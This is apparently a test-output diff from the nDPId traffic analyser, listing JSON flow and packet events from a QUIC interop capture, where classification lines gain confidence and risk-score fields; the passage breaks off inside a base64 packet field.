 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434530,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 01181{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1603816434530,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"ts_msec":1603816434530,"pkt":"PKn0qB\/spJGxgjQ5CABFwAJA69kAACYB7ksDefI2wKgBgAMDt3gAAAAARQAFALRdQAAhEei3wKgBgAN58ja3ogG7BOzsKsYKCgoKCHUJ14NKwS2PAABE0nUjXqgo3Pq+h\/Bzi9p31\/TZeG7dv7XIf5N1hruOb+rMEEShGYweXC+T8EETUns4xE1pcJfcd9QxJWLz4mk48BM1d7sz6D0g90Q7A6DSDnSX8zPHnk\/mBfB7WcT8ZfCXzHAFhGGnFcwiEQYipESmQ6UeXUdKLkbZVdxhnu5LdA7U8ofrC97xC4VdpB8+pct9Ef44k+OzR1LZByriJ678sYxqlbwGB9+J+7VwgUOg\/gH2R9dX6bQQUO7rTCoyUHrYGZ5osp+I31JLOOQ0C6bZs5jO72nIFTNVF37w0TIl1hS5YHNmjLHkXmrNxza9D1NWHtYItabi0jdmvYKXEW\/jtGDBbNI5Spt\/DdSwahkwacog7vEBAslclMpeaBEdIll7ht0275DdkEE5wCpSaptHi1ZfzWLt8\/3zVoN9gllA09tedp3dfnrCs3MbxDshoV7lFoWGdn\/dNMr60Cx3AUMtm2P3NvJ\/wl+FPKcSOjciGrJox3eMTCqBEuAzJo0ymq8aqrjO3V0G12SwfBJ9tJCn3UEWBx4Pq3qlqktq2\/Fy+CDEiIPPlLGrnjA5s631GXf+eke3F40ZavlVJrfNauZzZygjAUP+676+Kjhjmdgh5vVfrgA0zW4b73tJevIq4He558UKRJU4CMox8hYb3fCj6C3dh7FjwxE="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434530,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.594034}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434530,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.594034}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434535,"flow_last_seen":1603816434535,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434535,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1603816434535,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434535,"pkt":"pJGxgjQ5PKn0qB\/sht1gAJBbBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmgL0RUQTYhUTOCgoKCggKh53oSKcUIwAARL7ptyuGj3sWoCfzmGYT9c5knffzFTiJ5lVJXbpctUGbKL5ySK19+FWpax4\/nAYQUfvCM\/bhsgFtS9G+ZFtPXpli7k9OwELHwQ20mBGQWbjmI7hP6morZpTeRWxaKack+BC0iQiX9\/LIrfrGdoT1oDoUDperL3\/EWfbsAzs51Fr37OKsXNxMOnNCWganJYQDoS1NHvgUii8j2RT7vFE3V9d23tm2baG7XTpJE\/KumpBsVLcT3VzQxufgdMiVwmhOfmQTPXaJDGA\/jRTiFeXg7nXwXEtAxzBQgrLuBhQxPykcUp0c2\/phwIU04regmPrsDteoZwKZzuohFTkgaiJgBEO37GhILvwwBeV77OMpz83mtpaFJrhJUhOB5vM0\/RgcMPtcx4bSZUJUYD6nBLhQJ\/GvQEu7UlOsfkiIrZE+ZKc7Xlk9faNEXsEX+cAq53XDHpAkkbtjxhoLLEgwqg9w2+pJHK905szCqPYz1ey662LeHpygS8mmmH\/gOERXnPY24ktfjRbIPk+3jjlRJg9AEQHddCfLs\/0YynFjxEK6SkUDk3GOa0sGfGsU7zt7rbEh4JS4h\/\/R08A7nHPChHXr\/7ZgHR966vNTPtSXBteBzHwou8p5yVwauN1gN5GaWb31oFnrNAxiwuz4e2fwfa69YtXI4XWHFBvj4iNrdRBF9sHDZoob5bniwmHivCxgMW4+Jtbnaqfrv4Sp3dq00y6\/ur4ZEHV5m4FIMmbgmAyq9vvgmIFyJKBMGegGOoZYhISRV4ufDNEsgtjnm1Ha96l8R2gH9UD5FvAjfB\/ZwRBGmgFyc1RY+15Vl0HTZ4Rr+yCWwF2I4UFS+jzuwD+H6WEkNUgBjeLztMlKSo7QMs7PpOgFdZAlYejckZA1WodUw\/1bgj\/U6KGLbos4yPh+0rFNO0QtSRdW2TgBAAQucKeIvxgOUjTBEAP34nCw3lpKpedULlo5yFoLMltnNpkze\/b+9gBG8\/1mSO3ivzeDC3y6mANlLBm2iJns641SQdnTkf3L8X6YeBJsMYcaaiKYOyuuOiyeZy0YQZa4g5mFBz1gCqnQwBTBq6z8JWs1a\/iBlFkdzl55MjJD1jFCxVWdLyjInYMNmKxijI+ky9lNUsSaDzc5mgZpk3C0ZBbV058wqQx49fSF44m14OWseuaF+VY+qapJWKKL5t18OkWciu9MrAdQ4l66KAXEOIsGmkn8zlOyO4gaBESlpwfIO6YAp9wh9uTR9L+wkJgDcSe\/JWX30SUzbiRxqTmU9\/OJu2YJTPKi8wBs0qops1o6F9bQ4myo5lBZyqDquGfUWvrEXAbX82yldqPSTFnXWZt1UdImRyp1aGJVLjK7WjTb+ZSUcMVvxEHERZUt6VlUBe9SscDBCFdepioRLv56MnqrV+s4p\/g3CZ2sX0A9nX\/xgQxdccpjrif7tgBq+g7rjwIDWgS4NTZeETjOCtp53wYAhZZ32G\/hgRuBjIwqGUhTXHOoeOasvV+WD6Qh9WG\/ZAOn3eXObqDuYhD21bQbu7H9CTSFHgZo5\/P4wYz2WlEjbWMiQ9K7B5MQdxXUQYTDHm1OtDv1m9inaq9E9Mp1YP37ABzmfZ+XPVEzLA7x\/VqZvQgYfBYQAA=="}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434535,"flow_last_seen":1603816434535,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434535,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01036{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434535,"flow_last_seen":1603816434535,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434535,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434542,"flow_last_seen":1603816434542,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434542,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1603816434542,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434542,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAsZBAAEARzITAqAGAA3nyNu1wEVEE7LiZwwoKCgoI7mu7hqnhXwQAAETSneZc0FuQOOHT\/teiEyKQKqzHkPCOdcJLNU5VOm5QOz0aoCJBEfqd1iT7e6uyMoRT8wMX7assdH+rfwhkbtE0fDQ53avKQe54W1J5UEYikBP8CP81hlJVbphH435fnVTq7nYhJQx3T1Y6AQ2\/Im2so+HMSUWdbbnrP5LSk6E7PUTbsjJ7Z4IK2AyVHeK5bSLg80JZ1Sph0HZzQaEbqIMyi\/M6v3qgHFPF1JKKXsbwx36aShFPp5YRv\/soCC3iJDKx\/TOoopux88iYZkKX6xmVToWLTybIql7tHDaiQwlFHhBfrjhT6cVIuDMNZVXE8b8dgJrnGR4ypA9uhBp9z\/Snjb7kplkcAw9Yd0vXwuJxwvJbKYWpGBSBjpqgJK2NnsY91gg5TfSt3JN+70Jk3br16yCjz7tX60zGh5oP2DwLrrYetR3R0GFUOxDMh6G7aF3I80uIHLzKM5L7Cyq+eH+E4Oik6IopSkw7bwloBrghPMa9hxFBVEXX58oWV2xJT38EqSdgZFBF5dbInQYsnbTRjhDYyaiyt8vlg88mj5YsiwANcazCph4gIDWa4gyKspP8BKvUtXz02RGy3HX6Vo5Vamtwn+2PjOM+Q+DQVEQnn5msYlkn7ZY5ovQgEgbBX+huA6I5hUWWsPR3M2Kzn\/TPASjM5rwK0KxSpO5g\/gQQfc1S7J7YuDP8zIp427rx9HJYduWfVC4rgRUnB6I166YLVcOlExTMzRX5aOez8BEzIES9YduVGcZhm9AP3doiK0e16CBoljKKN4NSkTnRww5pIG7SP9IPdlyMMhv\/F65HJ9\/Qdzi\/8AR0RRXgbK4KSLJ1ZazP98Eo4okuRh2hJvsVfDsF82aUOJ+5IPV21tikqeD52JJgCcbnY1xvwCMuI9Ev5Q1BzfBglIWFmd3vD8LInWrtA2LQjCeOq98mFJn6QDvRQu5wKPIA\/ZgOKwVAUTiw4oj9THEfNPce2Rwgs9BQNDAwTNfNzVG4Uo8HZPdnnHL7R4K8hI28\/uWO7cqQHN0rdSoqUztCrLRvMc8S2B6IG\/FwTC+hPTm4cIQtFOJMoo2kOuyujyZ1LEIJszajyM3US0Z7vDZ\/NVv7NhCjNliBh1qCCQmrc2ZARdMzfQTwRZSk4Qp8dafvvYQ1LF9kATiR56vOstwif8mcEeSGpGjxHRxxaPCnx1FqTSBlji1+\/mVUMSnwTjTbZ8+IlF5bvzWmxCP6SmcY3uiWmUe8ABNCdQ6oFUGX7MujoMfHqznJ22xd4jRp9Th8CAdO6AtXd2qNEMNXvt+leql1vYAShneyVo44syrCJhZftvKw0lIESx6N8bEm9qmNGkSLU3jwsr4qMQ4GeNejADIeIEW8ilf6RTOWWH8Ge9WQmD0aziJpeLMRGeBecvHxLqJRfNb4UoC\/aiW\/ii+JMaepnbYUiRD4TObTS04rz7zN9ijDMemj465LaVNq0Le86L1W7PC8e6cQH0cTJum0Jqv\/LLqUQa9dj8VqTQbmKBPwwLy4YSngRqKOkKFIREtmChIase\/5QfE6hq1lhcHS9+TUiZhdPLF2dtk3KG4eRvLu8IjED0rc3A3SIXUgqoM1eHsOUNqbWaqmodcwXD4BHHuC3EdxDzolau+txc2+xwm+NH4ee2DBykjljA=="}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434542,"flow_last_seen":1603816434542,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434542,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01011{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434542,"flow_last_seen":1603816434542,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434542,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1603816434548,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1603816434548,"pkt":"PKn0qB\/spJGxgjQ5ht1gAW9\/ACMR7CoF0BgM6YEAzSri\/bO+xasgAQsHCsnVrqTT\/kdpHoB9AbuT9AAjezDGAAAAAAAIlGmXKMyAAG3\/AAAd\/wAAHP8AABs="}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1603816434551,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"ts_msec":1603816434551,"pkt":"PKn0qB\/spJGxgjQ5ht1gCVbMAB8RNSABC8hHpBwlAAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9AbvrugAfxC\/CAAAAAAAI4QMvVRUj5m0KGio6\/wAAHQ=="}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1603816434566,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"ts_msec":1603816434566,"pkt":"PKn0qB\/spJGxgjQ5ht1gC985ACsRNCoArABAAAQAAuBM\/\/5oGZ0gAQsHCsnVrqTT\/kdpHoB9Abu+QwArPVvlAAAAAAAIhDy+8x\/DNCJFR0cg\/wAAIP8AAB\/\/AAAe\/wAAHQ=="}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434569,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1603816434569,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434569,"pkt":"pJGxgjQ5PKn0qB\/sht1gCjENBNgRQCABCwcKydWupNP+R2kegH0gAQvIR6QcJQAAAAAAAAABx\/ERUQTYsYfACgoKCggwbWAZ48sZPQAARL5w5HpjTfB6HE2JQjNEB1YmIe76YRB4wkvrzI8Py+EIKqBcyOOLSUBuzT912JXZ\/2dY3gtcHrCUweZkn\/T5Hj7RPGvPZqKFDdtBnWxfnsXvr8VhF5wnML7O4OsWP5nPvl6UO93+O4xio85bG8BLk14nxVMaEegFPQw41vQotLY1zGwG27cqyluUTVS52eHYVV4j83Dk9aui6JZsd4LVyJRUX2\/aUckCDuajGznu7FC2CzoKmlR9VSfkua99+L62GemAPTQ91VNnpbP5stk\/eROyYCQjK0Rz1x4lCPUHi2bIL+APn\/wkXXipr29g8XanJpO+FGEylpXWsJrrg0SI3jR39YuKgH\/KrVFhaTiB2Suy3PaKmi\/RzU8ypvxDJGoEdKNt7WXrvIvEzAROWanRVHPIqtyzoyATCv6emaC6YOFoMEpZbjomg2doT6BJk+EvC+YAEUaf8b3SEIGnXU8yeMJTcxsinB0KKzvXhxRAp7xoQkgseCm99W1kW+XHhN1QN\/TaCtfCfSVrUo2xGKhv3ymR2Vaw4omOsXp6J7Sjc0mbrS90K7ilwCM+Wfg0YoSkSDUSXY1AQnPTNjr2FMqanb49do1WhubRfE\/Ck0eHMZWPpGaO\/mph4jfOtDGM6OgXvUUlp5ROucFlBzCmVKkIyc2H8apiOM+07MDibQplJ4Az2+90761IvBgwfhlEPgdX1KDSHaJG4rPehCnx1Pp+yquyrKEzA5js4oFilyAy0vgDYNnz8kRaeeuCwuFEJgvXo8qRWj3noFvI+zM05NzQAJ+bmWMPgrG27iBYNGIvoGvmATqr8JgYwP4vU+hSyzxuJhQCf9Z1Yvi3GDN3YdoljnhaMO1Savux67rztE8c\/C8yDYwfMl4Hk9h2CnmhjXRv\/3esiIjaH9dPCD88ewNCiifrhvE9uNwL83wO4sr5zyTtZLeOfofME+dgPVQ7bgkbsRZetMQrrAt+izEoATXGeuXSCXJvZamlYZRQA9Y1hkw06gQpABA8+7BxNLKVRwU4R\/6Vyg6EQNzzD\/YA5VOGJvjRexKDRdxqrmlRTQq5hfIyAJHy\/HvrSIrmlbTwI7l2tlyS+TSdUxPcmU7n6Qs72zr3JKtijpeZTjiOvn5gH3Wz3LwmTGnGrpdVcS5m3nAy4dlf71QOIEEceuZ1zTiItSS1w+qpRUZsN7KqSmVbH5OnT58ueYRcxpx7o59KZHrxOOtppX89XTCUe1\/U6RKWIbGwK5B8t\/KtZN8LmG0kgcpcavl50oHuWDKuSGhWn78YjrWPPggvwb2mtAvV2xgf+KzFIUqCZ4tP72EyCyT8fsNUCySwHshLWySXBxdWfBkmiQPmX6KQcUxW7vUusJWyjH+HlW1ebLdsvC6JTIU9jvt6ymyaMyI\/rm50GWHDSBGar9xKv8vS9NCFORMVJp5Z83e9YH5EXVTDOpimXhA8N2hI9UWL\/X+c8xQkqXD5T0yYXpVHt7NhIvTwpfhjbEcUyf+BaoxMbBWX09ubEe4WSF3SBA7Dg+tiSOpxP11Hn04MactOeduGtV3YGVM9qWIdA3KpmTnOn7t96V09pndKxqCgN1gD4va9ZR8fB8j+u3uruPi0w2uDTcAmxYeEKNSLqA=="}
-00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434569,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434569,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434569,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1603816434569,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434569,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAabBAAEARba\/AqAGAg58YxobPAbsE7IX8wwoKCgoIJv2XczUh4RIAAETSRoJYBYOeas73v5N6JeGR+D4vrTXWLHahs6zbYN2PSmfpsY6grm3D0Rg\/JjEbEbWdaTF+lx2JzZ6OUYarkFy+115N6m1b7gQSj030Q3\/SM1TNZj\/nSEEyPzf0GDxqQj4+nZP7WMShjiYRdKzXBQdLzKvZT8hwnZ4oB99gppgeNELMhqdd1SySqMlsoa6maZtwfk3WBUm6ygdONT8WTBN7k1sBIrC8taS2In6WoqpYjWgCgSqLDUPElTi6Wlu3qxPK0L89RJAyo7d95jjEyHvPN8tIah5cWcQDYEYe4huV1Wk4ReHtQlciAzAXks6By4Kk0EH6V\/vjIC8b6b+cCLYGgbSpy+UnT\/8ZA\/UQuk7xfmOopsc1Y98fvndGTrq5RKwehvcBoo5Mn7MwglvspnL5JNC3Wm1g6bxDaeVst7hRZBFiDlhiYaQ0Ab6hTr1EJaOuADWqvlem+VI3ScFJxVtLzW45MMzPqLsgDN0nwzvC5MgRoNBFenkwFuOGJL3cuoRXUyC3LM81pQYUYluofbI7QpbP2iRSlWRlGLd+f8zLs+KcyeL5yNSmFslj7bzWf\/JF6mVv58XYK55HQs40V9rrlz7Nj\/WpjPtqqYZhJzg0gyU\/lbPd8kQLgVED59ItVwC3fIrmrMfcRnaanuGrvWgwIdywVEgwonSypaCKhJxenk3liQiSK4PIyLjElDxx0+CyQwtFMw0J6Rd2Mh0rRN9Qg6bbB+l+1HBn2AZjjpQRkF3k+wmrwQ3tlFWbURiRza9xq8onWimWZ4E80sO2DhLrdh5rcVJQeQt4rdLXRJq+nwgrsVxBbz2\/q8\/SLYx1O2bZBHh\/9BOOD1ryspmCVDPmvYwFGBraeD2+NW89wNvReyoP3HK0rCJ\/kri1cIGHbCcj++dh0yrqPt7Tf\/h83mJX2ClPu+4JxyyaiUh6X8GxTD5uMA+60fYmu+ll1hlhETX4lTtQ\/kXioQnJXjK9uS5\/mUX\/uGF7bLIle1fQUQwXMiKDhED8bldaUYDhxS5xaoXVFHYCkZD1G0bx4wNv8Yb\/Z6CBWe+ohQSURy647CyvtGSWeEchDWk746VaGkX3lxlsbKJKHBhqx7ONQcIFzj1Uy1jMc0AJU7zrl2kD8zQXmaNY4cUoA+GXy043sC2xwegQudxFTao\/gdfkQ\/q1NCe\/ml37Rl6EO3X3l9xGK4gSgGFs8v4x6Cb5DrR4JVJ5cHHSfWZa9UBPO1JdiEg8\/VX\/TMt1fQN+ReU4W02BaESJr6JTbZ2z47SHhCBYG6zwySaG7Lw65ubXXruEdd1pYjzU7fMm7oTz8Lh\/jPP1IP0yMSfVCRBlQiy9xU4NDYENzi1wl4tIvdERDQbkkbp0nWFv+lt+bkws2Q1vZy+gP3OrU8l5zDk0wZvYK1K+G1iWmyU8uDxuww\/HPy3G9m9DbYJTtzjTkrnXSnww3izdOvRZeolPfe0Z6lcnGUQ1\/j4+H4gBCwQLWrpcyqpCaXzS0ah6Mc6s8FdIMqnxX4rU8rBpXWoJ14XtBm3Uyy1wVEeRuIc4t8D3Za5OjHN5cGk13mZGhzHFhggCcpbM8VxO4s5FnO5gkpIVe3rp914hsLEJPh7ThKO5jLy2z2hTqHf5sMr6